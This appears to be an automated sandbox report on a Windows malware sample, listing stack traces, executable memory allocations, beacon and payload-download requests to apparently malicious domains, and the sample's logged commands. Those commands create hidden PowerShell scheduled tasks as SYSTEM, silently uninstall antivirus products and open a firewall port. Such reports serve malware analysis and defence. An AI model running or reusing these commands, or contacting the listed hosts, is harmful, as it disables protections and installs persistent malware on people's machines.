RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74fb374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x761e4387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74faef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74fa6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74fa6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74fa6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74fc5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x750406b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x762bd7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x762bd876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x762bddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x761d8a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x761d8938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x761d950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x762bdccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x762bdb41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x762be1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x761d9367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x761d9326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x751762fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75176d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x751777c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7517788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x7619a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x7619853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x7619a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x761acd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x761ad87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7677b727
registers.esp: 32829804
registers.edi: 3132260
registers.eax: 32829804
registers.ebp: 32829884
registers.edx: 49
registers.ebx: 32830168
registers.esi: 2147746133
registers.ecx: 2909440
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74fb374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x762bf725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74fc414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x7618fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x762ba338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x76b8e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x76b672ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x76b5ab0d
IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x76b8c048
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x76b587f7
RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x76b58926
RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x76b5d55e
IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x76b8c44b
RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x76b5d1f6
RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x76b5d1ac
RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x76b5d40b
RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x76b5991b
RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x76b58d67
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x76b5a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76b59b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76b59aa8
DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x6f976f4f
DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x6f976e40
DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x6f9727a4
DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x6f972652
DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x6f97253d
DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x6f972411
DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x6f9725ab
wmic+0x39c80 @ 0xf9c80
wmic+0x3b06a @ 0xfb06a
wmic+0x3b1f8 @ 0xfb1f8
wmic+0x36fcd @ 0xf6fcd
wmic+0x3d6e9 @ 0xfd6e9
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7677b727
registers.esp: 2090488
registers.edi: 1981610512
registers.eax: 2090488
registers.ebp: 2090568
registers.edx: 1
registers.ebx: 2878764
registers.esi: 2147746133
registers.ecx: 1835695197
1 0 0
suspicious_features GET method with no useragent header suspicious_request GET http://t.qq88.ag/a.jsp?ipc_20210914?TEST22-PC*TEST22-PC$*2C43E82A-4640-204B-882F-B25EE182DD03*700217562
suspicious_features GET method with no useragent header suspicious_request GET http://t.ouler.cc/a.jsp?ipc_20210914?TEST22-PC*TEST22-PC$*2C43E82A-4640-204B-882F-B25EE182DD03*1953334123
suspicious_features GET method with no useragent header suspicious_request GET http://d.js88.ag/if.bin?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74
suspicious_features GET method with no useragent header suspicious_request GET http://d.js88.ag/m6.bin?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74
suspicious_features GET method with no useragent header suspicious_request GET http://d.js88.ag/kr.bin?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74
suspicious_features GET method with no useragent header suspicious_request GET http://d.js88.ag/?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74
suspicious_features GET method with no useragent header suspicious_request GET http://t.ss700.co/a.jsp?ipc_20210914?TEST22-PC*TEST22-PC$*2C43E82A-4640-204B-882F-B25EE182DD03*1723852997
suspicious_features GET method with no useragent header suspicious_request GET http://t.qq88.ag/report.jsp?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74&
suspicious_features GET method with no useragent header suspicious_request GET http://t.ouler.cc/report.jsp?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74&
suspicious_features GET method with no useragent header suspicious_request GET http://t.ss700.co/report.jsp?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74&
suspicious_features GET method with no useragent header suspicious_request GET http://t.jusanrihua.com/a.jsp?rep_20210914?TEST22-PC*TEST22-PC$*2C43E82A-4640-204B-882F-B25EE182DD03*583755988
suspicious_features GET method with no useragent header suspicious_request GET http://t.jusanrihua.com/a.jsp?rep_20210914?TEST22-PC*TEST22-PC$*2C43E82A-4640-204B-882F-B25EE182DD03*232384097
suspicious_features GET method with no useragent header suspicious_request GET http://d.js88.ag/mimi.dat?v=6f06ca&r=3
suspicious_features GET method with no useragent header suspicious_request GET http://d.js88.ag/knil.bin?v=6f06ca&r=2
suspicious_features GET method with no useragent header suspicious_request GET https://api.ipify.org/
request GET http://t.qq88.ag/a.jsp?ipc_20210914?TEST22-PC*TEST22-PC$*2C43E82A-4640-204B-882F-B25EE182DD03*700217562
request GET http://t.ouler.cc/a.jsp?ipc_20210914?TEST22-PC*TEST22-PC$*2C43E82A-4640-204B-882F-B25EE182DD03*1953334123
request GET http://d.js88.ag/if.bin?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74
request GET http://d.js88.ag/m6.bin?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74
request GET http://d.js88.ag/kr.bin?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74
request GET http://d.js88.ag/?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74
request GET http://t.ss700.co/a.jsp?ipc_20210914?TEST22-PC*TEST22-PC$*2C43E82A-4640-204B-882F-B25EE182DD03*1723852997
request GET http://t.qq88.ag/report.jsp?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74&
request GET http://t.ouler.cc/report.jsp?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74&
request GET http://t.ss700.co/report.jsp?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74&
request GET http://t.jusanrihua.com/a.jsp?rep_20210914?TEST22-PC*TEST22-PC$*2C43E82A-4640-204B-882F-B25EE182DD03*583755988
request GET http://t.jusanrihua.com/a.jsp?rep_20210914?TEST22-PC*TEST22-PC$*2C43E82A-4640-204B-882F-B25EE182DD03*232384097
request GET http://d.js88.ag/mimi.dat?v=6f06ca&r=3
request GET http://d.js88.ag/knil.bin?v=6f06ca&r=2
request GET https://api.ipify.org/
domain t.ouler.cc description Cocos Islands domain TLD
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023bb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023cf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02399000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05e00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05e01000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05e02000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05196000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05e10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05e03000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 1441792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x060b0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061d1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061d6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05197000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05e04000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05e05000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06020000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06021000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05181000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05198000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05199000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05e06000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x062c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ed4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 69632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ed8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x062c1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ee9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x062c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x062c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023c9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05e07000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0239d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05e08000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05e09000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0519a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05e0a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05e0b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x062c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05e11000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f921000
process_handle: 0xffffffff
1 0 0
domain api.ipify.org
cmdline "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball1 /F /tr blackball1
cmdline "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
cmdline wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
cmdline "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
cmdline "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
cmdline "C:\Windows\system32\cmd.exe" /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart
cmdline "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
cmdline "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \802xIaZHLEP /F /tr "powershell -w hidden -c PS_CMD"
cmdline wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
cmdline wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
cmdline "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
cmdline "C:\Windows\system32\schtasks.exe" /run /tn VIl8p0azRYG\gV7HWSKROT
cmdline "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa /F
cmdline "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
cmdline "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa1 /F
cmdline "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa2 /F
cmdline wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
cmdline "C:\Windows\system32\schtasks.exe" /run /tn \802xIaZHLEP
cmdline "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn VIl8p0azRYG\gV7HWSKROT /F /tr "powershell -w hidden -c PS_CMD"
cmdline "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\ObEKaMCF03\6UhxPVJW1Sq /F /tr "powershell -w hidden -c PS_CMD"
cmdline "C:\Windows\system32\cmd.exe" /c netsh.exe firewall add portopening tcp 65529 SDNSd
cmdline wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
cmdline wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
cmdline "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball
